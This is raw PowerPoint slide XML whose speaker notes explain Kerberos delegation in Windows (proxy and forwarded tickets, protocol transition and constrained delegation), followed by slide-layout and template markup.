        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70942315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The Need for Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" b="1"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client might need to let an application or a service connect to other servers or services on its behalf. A client might use a front-end server, for example, that then needs to authenticate with a back-end server. The front-end server needs to authenticate to the back-end server with the client's credentials, because if it authenticated under its own service account, it would have different authorization than the user.</a:t>
            </a:r>
          </a:p>
          <a:p>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multi-tier client/server application presents a special situation for the Kerberos protocol. In this kind of application, a client might connect to a server that must itself connect to a second server on the back end. For this to happen, the first server must have a ticket to the second. Ideally, the ticket should limit the first server's access on the second server to whatever the client—instead of the server—is authorized to do.</a:t>
            </a:r>
          </a:p>
          <a:p>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Kerberos protocol deals with this situation through a mechanism called delegation of authentication. Essentially, the client delegates authentication to a server by telling the KDC that the server is authorized to represent the client. The concept is similar to the concept of impersonation in Windows NT.</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Traditionally, the Kerberos protocol enabled delegation to be accomplished using one of two mechanisms:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Proxy tickets.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The client can get a ticket for the back-end server and then give it to the front-end server. Tickets obtained in this way—by a client for a proxy—are called proxy tickets. The difficulty with proxy tickets is that the client must have information about the name of the back-end server.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Forwarded tickets.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The client can give the front-end server a TGT that the server can use to request tickets as needed. Tickets obtained in this way—with credentials forwarded by a client—are called forwarded tickets. This second method overcomes the difficulty (that the client must have information about the name of the back-end server) presented by the first method.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Windows Server 2003 supports two new extensions for delegation:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Protocol transition extension.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The protocol transition extension allows a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>kerberized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> service (that is, a service designed to use Kerberos authentication features) to obtain a Kerberos service ticket on behalf of a Kerberos principal to the service itself without requiring the principal to initially authenticate to the KDC with a credential.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Constrained delegation extension. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The constrained delegation extension allows a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>kerberized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> service to obtain service tickets (under the delegated user's identity) to a subset of other services after it has been presented a service ticket obtained either through KRB_TGS_REQ or the protocol transition extension.</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Whether the KDC will allow clients to obtain proxy tickets or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> TGTs is a matter for Kerberos policy.</a:t>
            </a:r>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D0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8893766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Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>What Delegation Does for the Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Delegation of authentication allows the client to send its identity in the form of a Kerberos ticket to the front-end server. The front-end server can then impersonate the client and authenticate with the back-end server as if the front-end server were the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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Delegation is not limited to a single pair of a front-end and a back-end server. A client can delegate its identity to a service that can then authenticate with any number of back-end services. It is also possible for the client to delegate its identity to Service A, and for Service A to in turn delegate the client's identity to Service B, for Service B to delegate the client's identity to Service C, and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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The simpler case—in which the client delegates its identity to a front-end server so that the front-end server can authenticate in the client's security context to a back-end server—is more common.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Delegation of Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In Windows NT, a service can impersonate clients when accessing resources on the computer where the service process is running. In Windows 2000 and Windows Server 2003, a service can use the Kerberos protocol's delegation feature to impersonate clients on other computers, as well. For delegation of authentication to work, three conditions must be met:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The computers that host the client process, the service process, and the processes for back-end services must all be running Windows 2000, Windows XP, or Windows Server 2003 in an Active Directory domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client's account must be enabled for delegation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The service's account must be enabled for delegation.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3858876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7.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7.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7.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7.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7.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30.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32.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33.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8.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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jpe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2.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout6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3.jpe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5.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8.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId4"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fr-F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59FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1546101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59FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33511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59FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11701977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ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6804025" y="6381750"/>
            <a:ext cx="2133600" cy="476250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B3A99C8D-672C-4426-A7C9-A3315F570C2B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284951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0 Deck Intro Pic1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3638144"/>
            <a:ext cx="7772400" cy="936625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx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640080" y="4572000"/>
            <a:ext cx="7662672" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr>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7" descr="MSSVC_Large.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="57150"/>
            <a:ext cx="3429000" cy="1009650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="6474429"/>
            <a:ext cx="838200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1/1/2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6474429"/>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1" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="6474429"/>
            <a:ext cx="3657600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="cover_graphic1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1069848"/>
            <a:ext cx="9144000" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5498592"/>
            <a:ext cx="2667000" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5809488"/>
            <a:ext cx="2667000" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6135624"/>
            <a:ext cx="2667000" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Company</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338933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0 Deck Intro Pic2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3638144"/>
            <a:ext cx="7772400" cy="936625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx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640080" y="4572000"/>
            <a:ext cx="7662672" cy="841248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr>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7" descr="MSSVC_Large.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="57150"/>
            <a:ext cx="3429000" cy="1009650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="6474429"/>
            <a:ext cx="838200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1/1/2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6474429"/>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1" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="6474429"/>
            <a:ext cx="3657600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
